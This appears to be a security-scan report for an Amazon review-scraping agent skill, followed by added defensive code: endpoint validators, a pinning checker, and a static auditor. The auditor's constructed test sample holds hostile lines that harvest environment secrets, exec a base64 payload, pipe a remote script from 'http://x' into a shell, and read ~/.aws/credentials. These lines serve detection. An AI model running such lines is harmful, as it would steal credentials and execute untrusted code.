Trusted: risk score 5/100
Last scan: 2 days ago
amazon-review-workbook
Collect Amazon product reviews via Chrome CDP and export a 14-column delivery-ready workbook with optional DeepLX translation and model-assisted semantic tagging.
Legitimate Amazon review scraper using Chrome CDP; all operations are documented, scoped, and appropriate for the stated purpose.
Skill name: amazon-review-workbook
Analysis time: 49.5s
Engine: pi
Verdict: safe to install
No action needed. The skill is safe to use as documented.

Security findings (5)

Severity: Low
Finding: No dependency version pinning
Details: No requirements.txt or package.json is present; requests is imported with no version constraint (shown as * in the dependency table). No known CVE is flagged for the versions in use.
Evidence: import requests
Recommendation: Add a requirements.txt with pinned versions if distributing as a package
Location: scripts/amazon_review_workbook.py:1

Severity: Info
Finding: Chrome CDP browser automation
Details: Uses the Chrome remote debugging protocol (port 9222) to scrape Amazon. All CDP eval expressions were reviewed; no data is exfiltrated, and the session handles only data scraped from Amazon.
Evidence: BrowserSession class
Recommendation: None; this is the documented mechanism
Location: scripts/amazon_review_workbook.py:657

Severity: Info
Finding: External network calls only to user-configured DeepLX
Details: Network requests go to a URL configured by the user via the DEEPLX_API_URL environment variable. No hardcoded external IPs.
Evidence: requests.post(api_url, ...)
Recommendation: None; this is the documented translation feature
Location: scripts/deeplx_translate.py:95

Severity: Info
Finding: No sensitive path access
Details: The script does not access ~/.ssh, ~/.aws, or .env (other than its own optional .env for DeepLX config), nor any credential store outside its documented scope.
Evidence: No os.environ iteration for secrets
Recommendation: None
Location: scripts/amazon_review_workbook.py:1

Severity: Info
Finding: No hidden functionality
Details: All code paths are traceable to capabilities documented in SKILL.md. CDP expressions are visible inline. No obfuscation, eval(), or base64 payloads.
Evidence: browser.eval(expression)
Recommendation: None
Location: scripts/amazon_review_workbook.py:637
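The two network paths described in the "Chrome CDP browser automation" and "External network calls only to user-configured DeepLX" findings are where a reviewer should confirm that trust is bounded the way the report says: the CDP socket must be loopback only, and the DeepLX URL is operator-supplied, so review text and the optional API key go wherever that value points. The block below is an added example, not code from the amazon-review-workbook skill: it validates both endpoints before any connection is made. The function names and the DEEPLX_API_KEY variable name are assumptions; the report itself names only DEEPLX_API_URL, "KEY", and localhost:9222.

```python
"""Endpoint checks for a CDP-driven scraper with an operator-configured
translation API. Added example for this report, not code from the
amazon-review-workbook skill; names below are assumptions."""
from __future__ import annotations

import ipaddress
from urllib.parse import urlsplit

LOOPBACK_NAMES = {"localhost", "127.0.0.1", "::1"}


def is_loopback(host: str) -> bool:
    """True for localhost and loopback IP literals (IPv4 and IPv6)."""
    if host.lower() in LOOPBACK_NAMES:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def check_cdp_endpoint(url: str, expected_port: int = 9222) -> list[str]:
    """Problems with a Chrome remote-debugging URL.

    The report says the skill talks to localhost:9222 only. A CDP socket that
    is reachable from elsewhere hands out the whole browser session (cookies,
    the logged-in Amazon account), so anything but loopback is a finding."""
    problems: list[str] = []
    parts = urlsplit(url)
    if parts.scheme not in ("http", "ws"):
        problems.append(f"unexpected scheme {parts.scheme!r}")
    if not parts.hostname or not is_loopback(parts.hostname):
        problems.append(f"non-loopback host {parts.hostname!r}")
    if parts.port != expected_port:
        problems.append(f"port {parts.port} != {expected_port}")
    return problems


def check_deeplx_url(url: str) -> list[str]:
    """Problems with DEEPLX_API_URL.

    Review text and the optional API key are POSTed to this URL, so the
    operator-supplied value is the trust boundary: require TLS unless the host
    is loopback, refuse embedded credentials, and catch the README placeholder."""
    problems: list[str] = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https"):
        problems.append(f"unexpected scheme {parts.scheme!r}")
    elif parts.scheme == "http" and not is_loopback(host):
        problems.append("plaintext http to a non-loopback host")
    if not host:
        problems.append("missing host")
    if parts.username or parts.password:
        problems.append("credentials embedded in URL")
    if host == "your-deeplx-host":  # placeholder value shipped at README.md:53
        problems.append("README placeholder host left unchanged")
    return problems


def deeplx_config(env: dict[str, str]) -> tuple[str | None, str | None]:
    """Read the two documented variables by name.

    DEEPLX_API_URL is named in the report; DEEPLX_API_KEY is this example's
    assumed name for the optional key. Looking up fixed names, rather than
    iterating the environment, is the pattern the report checks for under
    'no credential harvesting'."""
    url = env.get("DEEPLX_API_URL")
    key = env.get("DEEPLX_API_KEY")
    if url:
        problems = check_deeplx_url(url)
        if problems:
            raise ValueError("DEEPLX_API_URL rejected: " + "; ".join(problems))
    return url, key


if __name__ == "__main__":
    print(check_cdp_endpoint("http://127.0.0.1:9222/json/version"))  # []
    print(check_cdp_endpoint("http://0.0.0.0:9222/json/version"))    # non-loopback host
    print(check_deeplx_url("https://your-deeplx-host/translate"))    # placeholder left in place
```

The placeholder check is worth keeping: README.md:53 ships https://your-deeplx-host/translate as the example value, and a value copied unchanged would send review text and the API key to whatever host that name resolves to on the operator's network rather than failing closed.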
Permissions (declared vs. inferred)

Resource               Declared  Inferred  Status         Evidence
File system            READ      READ      ✓ consistent   Reads JSON/CSV/XLSX output files and local .env
Network access         READ      READ      ✓ consistent   Makes HTTP POST to the user-configured DeepLX endpoint only
Command execution      WRITE     WRITE     ✓ consistent   Executes Python scripts via CLI; standard for script-based skills
Environment variables  NONE      READ      ✓ consistent   Reads DEEPLX_API_URL/KEY from the environment; does not harvest credentials
Skill invocation       NONE      NONE                     No skill invocation chains detected
Clipboard              NONE      NONE                     No clipboard access
Browser                READ      READ      ✓ consistent   Chrome CDP on localhost:9222; strictly scoped to scraping
Database               WRITE     WRITE     ✓ consistent   SQLite cache for review data; contained in the output directory

Note: the environment-variable row declares NONE while the inferred permission is READ. The skill's declaration undercounts what it actually reads (DEEPLX_API_URL/KEY) and should be updated, even though the scanner marks the row consistent.
URL findings (2)

Severity: Medium
Type: External URL
URL: https://your-deeplx-host/translate
Location: README.md:53

Severity: Medium
Type: External URL
URL: http://127.0.0.1:
Location: scripts/amazon_review_workbook.py:675

The first is the placeholder DeepLX host from the README; the second is the loopback Chrome CDP endpoint referenced in the browser permission row.

Directory structure

12 files · 175.0 KB · 5210 lines
Python: 5 files · 4471 lines   Markdown: 6 files · 735 lines   YAML: 1 file · 4 lines
├─ agents
│  └─ openai.yaml                 YAML      4L · 352 B
├─ references
│  ├─ output-schema.md            Markdown  81L · 2.4 KB
│  ├─ setup.md                    Markdown  104L · 3.1 KB
│  └─ tagging-guidelines.md       Markdown  129L · 4.1 KB
├─ scripts
│  ├─ amazon_review_workbook.py   Python    2415L · 83.8 KB
│  ├─ deeplx_translate.py         Python    330L · 9.6 KB
│  ├─ label_workflow.py           Python    663L · 20.3 KB
│  ├─ review_cache.py             Python    465L · 15.7 KB
│  └─ review_delivery_schema.py   Python    598L · 18.6 KB
├─ LICENSE.zh-CN.md               Markdown  23L · 1.1 KB
├─ README.md                      Markdown  240L · 6.4 KB
└─ SKILL.md                       Markdown  158L · 9.7 KB

Dependency analysis (5)

Package           Version   Source   Known vulnerabilities / notes
requests          *         pip      No known CVE for the current version; should be pinned for production
websocket-client  *         pip      Used for the Chrome CDP WebSocket
pandas            *         pip      Workbook generation
openpyxl          *         pip      XLSX output
sqlite3           built-in  stdlib   Local caching

* = no version constraint
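Both the "No dependency version pinning" finding and the table above record that every third-party package is unconstrained. The block below is an added example, not the skill's own code (the skill ships no requirements file): a checker for the pinning discipline the recommendation asks for, exact `==` versions plus `--hash` entries so pip refuses a substituted artifact. The sample requirements text, its version numbers and the all-zero hash are constructed for this example.

```python
"""Pinning check for a requirements.txt. Added example for the dependency
table above; the skill ships no requirements file, so the sample below is
constructed. Parses a small subset of requirement lines: name, optional
extras, version specifier, environment marker, and --hash options."""
from __future__ import annotations

import re
from typing import Iterator

_REQ = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(\[[^\]]*\])?\s*(.*)$")


def _logical_lines(text: str) -> Iterator[str]:
    """Join backslash continuations and drop comments and blank lines."""
    buf = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            yield buf.strip()
        buf = ""
    if buf.strip():
        yield buf.strip()


def normalize(name: str) -> str:
    """PEP 503 project-name normalization."""
    return re.sub(r"[-_.]+", "-", name).lower()


def check_requirements(text: str) -> dict[str, list[str]]:
    """Map each normalized package name to its pinning problems.

    A supply-chain-safe line is `name==X.Y.Z --hash=sha256:...`: an exact
    version so resolution cannot drift, and a hash so pip refuses a
    substituted artifact (pip enforces hashes for every line once any line
    carries --hash, or when run with --require-hashes)."""
    result: dict[str, list[str]] = {}
    for line in _logical_lines(text):
        tokens = line.split()
        if tokens[0].startswith("-"):          # -r, -e, --index-url, ...
            continue
        opts = [t for t in tokens if t.startswith("--")]
        req = " ".join(t for t in tokens if not t.startswith("--"))
        req = req.split(";", 1)[0].strip()     # drop environment marker
        m = _REQ.match(req)
        if not m:
            continue
        name, _extras, spec = m.groups()
        spec = spec.replace(" ", "")
        issues: list[str] = []
        if not spec:
            issues.append("no version specifier")
        elif not spec.startswith("==") or "*" in spec or "," in spec:
            issues.append(f"non-exact specifier {spec!r}")
        if not any(o.startswith("--hash=") for o in opts):
            issues.append("no --hash (pip cannot verify the artifact)")
        result[normalize(name)] = issues
    return result


# Constructed sample for the skill's documented third-party imports; the
# versions and the all-zero hash are placeholders, not the skill's real pins.
SAMPLE = """\
requests==2.32.3 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
websocket-client>=1.8
pandas[excel]
openpyxl==3.1.*
"""

if __name__ == "__main__":
    for pkg, issues in check_requirements(SAMPLE).items():
        print(pkg, issues or "ok")
```

Only the requests line passes; the other three show the forms that look pinned but are not (a lower bound, no specifier at all, a wildcard patch version), none of which stops a future release or a replaced wheel from being installed.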

Security highlights

✓ Comprehensive SKILL.md with explicit capability declarations
✓ Clean separation of concerns across 5 focused Python modules
✓ Chrome CDP access strictly scoped to localhost:9222
✓ No credential harvesting beyond optional DeepLX API key (used only for translation)
✓ No data exfiltration — all scraped data stays in local output directory
✓ SQLite cache contained within output directory, not system paths
✓ No subprocess or shell command injection vectors
✓ No base64/eval/atob obfuscation patterns
✓ No remote script download (curl|bash, wget|sh)
✓ No iteration through os.environ for sensitive keys
✓ No access to ~/.ssh, ~/.aws/credentials, or similar sensitive paths
✓ Well-structured code with type hints and error handling
✓ Explicit failure boundaries documented in SKILL.md
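The highlights above are the checklist the scanner applied to the five Python modules: no builtin eval/exec, no base64 payloads, no shell pipelines or curl|sh, no iteration over os.environ, no sensitive paths, and CDP expressions visible inline. The block below is an added example, neither the scanner's engine nor the skill's code: an AST-based pass that applies that checklist to Python source, run over two constructed samples, one shaped like the report's description of the skill and one that trips every rule. It also goes one step beyond the page's checklist by flagging a CDP eval expression assembled from runtime values, which is where untrusted review text could become injected JavaScript in the page context.

```python
"""Static checks mirroring the highlights above. Added example for this
report; it is neither the scanner's engine nor code from the skill. The two
sample sources are constructed to resemble what the report describes."""
from __future__ import annotations

import ast

# Paths the report says the skill never touches. ".env" is omitted on purpose:
# the skill's own optional .env for DeepLX config is in scope.
SENSITIVE_PATHS = (".ssh", ".aws", ".netrc", ".kube", ".docker/config.json")
SHELL_CALLS = {"os.system", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_output"}


def _call_name(node: ast.Call) -> str:
    """Dotted name of the callee, e.g. 'os.environ.get' or 'exec'."""
    parts: list[str] = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def _shell_true(node: ast.Call) -> bool:
    return any(k.arg == "shell" and isinstance(k.value, ast.Constant)
               and k.value.value is True for k in node.keywords)


def audit(source: str) -> list[str]:
    """Return 'L<line>: <issue>' strings, sorted by line, for the patterns the
    report lists: builtin eval/exec, base64 decoding, shell execution,
    curl|sh, os.environ iteration, sensitive paths, and CDP expressions
    assembled from runtime values (where untrusted text could become JS)."""
    findings: list[str] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            # Only the *builtin* eval/exec count; a method named .eval, such as
            # the skill's browser.eval(expression) CDP wrapper, is not Python eval.
            if isinstance(node.func, ast.Name) and name in ("eval", "exec"):
                findings.append(f"L{node.lineno}: Python {name}() on runtime data")
            elif name.startswith("base64.") and "decode" in name:
                findings.append(f"L{node.lineno}: base64 decoding, review for hidden payloads")
            elif name in SHELL_CALLS and (name == "os.system" or _shell_true(node)):
                findings.append(f"L{node.lineno}: shell command execution via {name}")
            elif (name.endswith((".eval", ".evaluate")) and node.args
                  and isinstance(node.args[0], (ast.JoinedStr, ast.BinOp))):
                findings.append(f"L{node.lineno}: CDP expression built from runtime values, review for JS injection")
        elif isinstance(node, ast.For) and ast.unparse(node.iter).startswith("os.environ"):
            findings.append(f"L{node.lineno}: iterates os.environ (credential harvesting pattern)")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
            if any(marker in text for marker in SENSITIVE_PATHS):
                findings.append(f"L{node.lineno}: references sensitive path {text!r}")
            if ("curl" in text or "wget" in text) and ("| sh" in text or "| bash" in text):
                findings.append(f"L{node.lineno}: remote script piped to a shell")
    return sorted(findings, key=lambda f: int(f[1:f.index(":")]))


# Constructed sample resembling the report's description of the skill.
CLEAN = '''
import os, requests
api_url = os.environ.get("DEEPLX_API_URL")
api_key = os.environ.get("DEEPLX_API_KEY")
resp = requests.post(api_url, json={"text": text}, timeout=30)
count = browser.eval("document.querySelectorAll('[data-hook=review]').length")
'''

# Constructed sample exercising every pattern; it is not from any real skill.
SUSPECT = '''
import os, base64, subprocess
for k, v in os.environ.items():
    if "KEY" in k: leak(k, v)
payload = base64.b64decode("aW1wb3J0IG9z")
exec(payload)
subprocess.run("curl http://x/y.sh | sh", shell=True)
open(os.path.expanduser("~/.aws/credentials")).read()
browser.eval(f"fetch('/?q={query}')")
'''

if __name__ == "__main__":
    print(audit(CLEAN))    # []
    for line in audit(SUSPECT):
        print(line)
```

The distinction between builtin `eval` and a `.eval` method is deliberate: the report's evidence line `browser.eval(expression)` is a CDP Runtime wrapper, and a naive grep for "eval(" would flag it as obfuscation. The injection rule is the complement: a wrapper is fine as long as what goes into it is a literal or vetted expression, not an f-string built from scraped text.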